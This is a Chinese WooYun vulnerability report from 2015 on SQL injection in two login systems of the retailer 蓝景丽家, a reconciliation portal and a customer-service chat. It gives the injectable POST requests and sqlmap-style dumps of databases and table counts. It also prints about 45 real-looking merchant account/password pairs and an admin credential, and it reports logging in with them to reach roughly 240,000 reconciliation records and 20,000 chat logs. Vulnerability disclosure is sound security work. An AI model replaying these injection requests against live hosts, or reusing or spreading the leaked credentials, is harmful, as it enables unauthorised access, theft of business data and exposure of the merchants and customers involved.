当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0163824

漏洞标题:蓝景丽家旗下两处SQL注入(24W对账信息泄露)

相关厂商:蓝景丽家

漏洞作者: BlackWolf

提交时间:2015-12-25 13:17

修复时间:2016-02-07 17:56

公开时间:2016-02-07 17:56

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:15

漏洞状态:未联系到厂商或者厂商积极忽略

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2015-12-25: 积极联系厂商并且等待厂商认领中,细节不对外公开
2016-02-07: 厂商已经主动忽略漏洞,细节向公众公开

简要描述:

RT

详细说明:

蓝景丽家旗下:客服登录系统、网上对账系统存在POST注入
蓝景丽家现有品牌家居厂商526家,知名家装公司15家,多年来凭借高品质的家居产品,科学完善的管理体系及坚持不懈的诚信服务,塑造了一流的企业品牌形象。蓝景丽家在厂商与商品管理方面,一贯实行产品标准准入制等一系列配套管理措施;规范厂商必须使用标准的北京市家具建材买卖合同进行统一收银交易认证;对所有销售商品执行先行负责制。在企业内部管理方面,蓝景丽家坚持运行国际化、标准化的内部管理体系。截止到2010年,商城在全国家居行业内已连续六年连续通过“质量/环境/职业健康安全”三项国际管理体系认证。在京城众多品牌家居卖场中,蓝景丽家通过多年来不懈的努力发展和进取创新,在广大消费者心中已建立了良好的口碑和品牌形象。在2007年蓝景丽家荣获北京市综合治理办公室、北京市公安局、北京市工商局联合颁发的“首都平安示范市场”称号;2008年和2009年度再次荣获北京市消费者协会颁发的“诚信服务示范单位”荣誉,2011年又被国家工商行政管理总局授予“全国创建诚信市场先进单位”荣誉称号,成为北京市唯一获此殊荣的专业市场。
1.网上对账系统:http://mgdz.ljlj.cc/account/login.php

POST /account/login.php HTTP/1.1
Host: mgdz.ljlj.cc
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:43.0) Gecko/20100101 Firefox/43.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Referer: http://mgdz.ljlj.cc/account/login.php
Cookie: PHPSESSID=3cuo62ms1hjk36s60k78gasgd6
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 38
fr_t=admin&pw=admin&Submit=1&x=13&y=17


1.jpg


available databases [3]:
[*] db_account_1
[*] information_schema
[*] test
Database: db_account_1
[9 tables]
+----------------+
| ac_account |
| ac_account_tmp |
| ac_decount |
| ac_mes |
| ac_mes_else |
| ac_mes_list |
| ac_ques |
| ac_times |
| ddadmin |
+----------------+
Database: db_account_1
+----------------+---------+
| Table | Entries |
+----------------+---------+
| ac_account | 246395 |
| ac_times | 35952 |
| ac_account_tmp | 1410 |
| ddadmin | 264 |
| ac_ques | 53 |
| ac_mes_else | 2 |
| ac_mes_list | 1 |
+----------------+---------+
24万对账信息:

1.2.jpg


200多家对账单位(截取一部分):
账号: 密码
mg00247 | 010101 |
mg01013 | 010424 |
mg00213 | 053403 |
mg00065 | 060521 |
mg00102 | 111111 |
mg00975 | 111118 |
TEST | 112233 |
EDIOR | 123 |
mg00913 | 123321 |
mg01024 | 123456 |
xeilihong | 123456 |
CAIWU02 | 123456 |
mg00250 | 13522628388 |
mg00232 | 197428 |
mg00041 | 1982830 |
mg00156 | 20041209 |
mg00874 | 2009 |
mg00947 | 278606 |
mg00086 | 324211 |
mg00153 | 340702 |
mg00904 | 386150 |
mg00841 | 463009 |
mg00044 | 506183 |
mg00133 | 519519 |
mg00188 | 598598 |
mg00866 | 599999 |
mg00033 | 62244980 |
mg00024 | 62253921 |
mg00154 | 62268898 |
CAIWU01 | 654321 |
MG00817 | 654321 |
mg00060 | 686868 |
MG00798 | 702504 |
mg00959 | 760318 |
mg00072 | 771123 |
mg00830 | 792034 |
MG00810 | 81509800 |
mg00045 | 851116 |
yewu03 | 852741963 |
mg00047 | 870515 |
mg00961 | 894120 |
mg00134 | 953045 |
mg00966 | 985920 |
mg00796 | mg00796 |
SYSADMIN | mgjp |
-----------+-------------+
选取其中一个登录成功
账号:mg00250 密码:13522628388

2.jpg


2.客服登录系统:http://chat.ljlj.cc/login.class.php

POST /login.class.php?act=doLogin HTTP/1.1
Host: chat.ljlj.cc
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:43.0) Gecko/20100101 Firefox/43.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Referer: http://chat.ljlj.cc/login.class.php
Cookie: Hm_lvt_d820fd55779776936c05e493eb2ffb57=1450838365,1450839600,1450839735; Hm_lpvt_d820fd55779776936c05e493eb2ffb57=1450839735; ci_session=a%3A5%3A%7Bs%3A10%3A%22session_id%22%3Bs%3A32%3A%22b256b90c1f081f487e209105cb040b7a%22%3Bs%3A10%3A%22ip_address%22%3Bs%3A15%3A%22171.217.169.217%22%3Bs%3A10%3A%22user_agent%22%3Bs%3A72%3A%22Mozilla%2F5.0+%28Windows+NT+6.1%3B+WOW64%3B+rv%3A43.0%29+Gecko%2F20100101+Firefox%2F43.0%22%3Bs%3A13%3A%22last_activity%22%3Bi%3A1450839599%3Bs%3A9%3A%22user_data%22%3Bs%3A0%3A%22%22%3B%7D455b31e0e2251146ae4f2003b8ecee69
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 65
loginusername=admin&loginpassword=admin&submit=%E7%99%BB%E5%BD%95


DBA权限注入

3.jpg


Database: db_ljmallim
Table: im_user
[12 columns]
+---------------+-------------+
| Column | Type |
+---------------+-------------+
| activated | tinyint(1) |
| displayorder | int(10) |
| isonline | tinyint(1) |
| lastlogin | int(11) |
| owner_name | varchar(60) |
| password | varchar(32) |
| recommend | tinyint(1) |
| store_id | int(10) |
| userfrontname | varchar(64) |
| usergroupid | int(10) |
| userid | int(10) |
| username | varchar(64) |
+---------------+-------------+
注入得到管理员账号;admin,密码:admin852

漏洞证明:

客服系统登录成功

4.jpg


5.jpg


6.jpg


2万客服聊天记录

7.jpg


7.1.jpg

修复方案:

过滤

版权声明:转载请注明来源 BlackWolf@乌云


漏洞回应

厂商回应:

未能联系到厂商或者厂商积极拒绝